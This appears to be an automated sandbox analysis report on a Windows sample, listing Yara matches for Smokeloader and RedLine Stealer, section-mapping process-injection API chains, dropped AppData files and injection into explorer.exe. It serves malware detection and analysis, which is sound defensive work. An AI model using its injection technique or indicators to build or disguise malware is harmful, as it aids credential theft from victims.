                Source: Yara matchFile source: 00000009.00000002.2882830547.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2132356094.0000000000561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2645253603.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000003.2593902376.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 00000008.00000002.2780852032.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000000.00000002.2133342006.000000000059E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000004.00000002.2369233302.000000000068D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000007.00000002.2645309546.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000007.00000002.2645014782.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000004.00000002.2369070542.0000000000610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000009.00000002.2882578584.000000000057D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000008.00000002.2780779918.000000000072F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000002.2132079925.00000000004F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000004.00000002.2369106614.0000000000631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000008.00000002.2780906751.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000009.00000002.2882405099.0000000000530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000009.00000002.2882830547.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000009.00000002.2882377555.0000000000520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000008.00000002.2780540702.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000002.2132356094.0000000000561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000000.00000002.2132022634.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000004.00000002.2369051681.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000007.00000002.2645253603.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000007.00000002.2644866394.000000000058D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeCode function: 0_2_00401514 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401514
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeCode function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,0_2_00402F97
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeCode function: 0_2_00401542 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401542
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeCode function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,0_2_00403247
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeCode function: 0_2_00401549 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401549
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeCode function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,0_2_0040324F
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeCode function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,0_2_00403256
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeCode function: 0_2_00401557 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401557
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeCode function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,0_2_0040326C
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeCode function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,NtEnumerateKey,0_2_00403277
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeCode function: 0_2_004014FE LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014FE
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeCode function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,0_2_00403290
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 4_2_00401514 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401514
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 4_2_00402F97 RtlCreateUserThread,NtTerminateProcess,4_2_00402F97
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 4_2_00401542 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401542
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 4_2_00403247 NtTerminateProcess,GetModuleHandleA,4_2_00403247
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 4_2_00401549 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401549
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 4_2_0040324F NtTerminateProcess,GetModuleHandleA,4_2_0040324F
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 4_2_00403256 NtTerminateProcess,GetModuleHandleA,4_2_00403256
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 4_2_00401557 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401557
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 4_2_0040326C NtTerminateProcess,GetModuleHandleA,4_2_0040326C
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 4_2_00403277 NtTerminateProcess,GetModuleHandleA,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,towlower,4_2_00403277
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 4_2_004014FE LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014FE
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 4_2_00403290 NtTerminateProcess,GetModuleHandleA,4_2_00403290
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeCode function: 7_2_00403043 RtlCreateUserThread,NtTerminateProcess,7_2_00403043
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeCode function: 7_2_004014C4 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004014C4
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeCode function: 7_2_00401508 NtAllocateVirtualMemory,7_2_00401508
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeCode function: 7_2_004014CF NtAllocateVirtualMemory,7_2_004014CF
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeCode function: 7_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004015D5
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeCode function: 7_2_004014DE NtAllocateVirtualMemory,7_2_004014DE
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeCode function: 7_2_004015DF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004015DF
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeCode function: 7_2_004015E6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004015E6
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeCode function: 7_2_004015F2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004015F2
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeCode function: 7_2_004014F5 NtAllocateVirtualMemory,7_2_004014F5
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeCode function: 7_2_004014F8 NtAllocateVirtualMemory,7_2_004014F8
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeCode function: 7_2_004014FB NtAllocateVirtualMemory,7_2_004014FB
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 8_2_00401514 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_00401514
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 8_2_00402F97 RtlCreateUserThread,NtTerminateProcess,8_2_00402F97
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 8_2_00401542 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_00401542
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 8_2_00403247 NtTerminateProcess,GetModuleHandleA,8_2_00403247
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 8_2_00401549 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_00401549
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 8_2_0040324F NtTerminateProcess,GetModuleHandleA,8_2_0040324F
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 8_2_00403256 NtTerminateProcess,GetModuleHandleA,8_2_00403256
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 8_2_00401557 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_00401557
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 8_2_0040326C NtTerminateProcess,GetModuleHandleA,8_2_0040326C
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 8_2_00403277 NtTerminateProcess,GetModuleHandleA,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,towlower,8_2_00403277
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 8_2_004014FE LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,VirtualProtect,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_004014FE
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 8_2_00403290 NtTerminateProcess,GetModuleHandleA,8_2_00403290
                Source: C:\Users\user\AppData\Roaming\jtihrdrCode function: 9_2_00403043 RtlCreateUserThread,NtTerminateProcess,9_2_00403043
                Source: C:\Users\user\AppData\Roaming\jtihrdrCode function: 9_2_004014C4 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_004014C4
                Source: C:\Users\user\AppData\Roaming\jtihrdrCode function: 9_2_00401508 NtAllocateVirtualMemory,9_2_00401508
                Source: C:\Users\user\AppData\Roaming\jtihrdrCode function: 9_2_004014CF NtAllocateVirtualMemory,9_2_004014CF
                Source: C:\Users\user\AppData\Roaming\jtihrdrCode function: 9_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_004015D5
                Source: C:\Users\user\AppData\Roaming\jtihrdrCode function: 9_2_004014DE NtAllocateVirtualMemory,9_2_004014DE
                Source: C:\Users\user\AppData\Roaming\jtihrdrCode function: 9_2_004015DF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_004015DF
                Source: C:\Users\user\AppData\Roaming\jtihrdrCode function: 9_2_004015E6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_004015E6
                Source: C:\Users\user\AppData\Roaming\jtihrdrCode function: 9_2_004015F2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_004015F2
                Source: C:\Users\user\AppData\Roaming\jtihrdrCode function: 9_2_004014F5 NtAllocateVirtualMemory,9_2_004014F5
                Source: C:\Users\user\AppData\Roaming\jtihrdrCode function: 9_2_004014F8 NtAllocateVirtualMemory,9_2_004014F8
                Source: C:\Users\user\AppData\Roaming\jtihrdrCode function: 9_2_004014FB NtAllocateVirtualMemory,9_2_004014FB
                Source: BzLGqYKy7o.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 00000008.00000002.2780852032.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000000.00000002.2133342006.000000000059E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000004.00000002.2369233302.000000000068D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000007.00000002.2645309546.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000007.00000002.2645014782.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000004.00000002.2369070542.0000000000610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000009.00000002.2882578584.000000000057D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000008.00000002.2780779918.000000000072F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.2132079925.00000000004F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000004.00000002.2369106614.0000000000631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000008.00000002.2780906751.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000009.00000002.2882405099.0000000000530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000009.00000002.2882830547.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000009.00000002.2882377555.0000000000520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000008.00000002.2780540702.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000002.2132356094.0000000000561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000000.00000002.2132022634.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000004.00000002.2369051681.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000007.00000002.2645253603.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000007.00000002.2644866394.000000000058D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: classification engineClassification label: mal100.troj.evad.winEXE@6/4@7/4
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeCode function: 0_2_005B01D0 CreateToolhelp32Snapshot,Module32First,0_2_005B01D0
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\teihrdrJump to behavior
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B9A0.tmpJump to behavior
                Source: BzLGqYKy7o.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: BzLGqYKy7o.exeReversingLabs: Detection: 31%
                Source: unknownProcess created: C:\Users\user\Desktop\BzLGqYKy7o.exe "C:\Users\user\Desktop\BzLGqYKy7o.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\teihrdr C:\Users\user\AppData\Roaming\teihrdr
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B9A0.exe C:\Users\user\AppData\Local\Temp\B9A0.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\teihrdr C:\Users\user\AppData\Roaming\teihrdr
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\jtihrdr C:\Users\user\AppData\Roaming\jtihrdr
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B9A0.exe C:\Users\user\AppData\Local\Temp\B9A0.exeJump to behavior
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeSection loaded: winhttp.dllJump to behavior
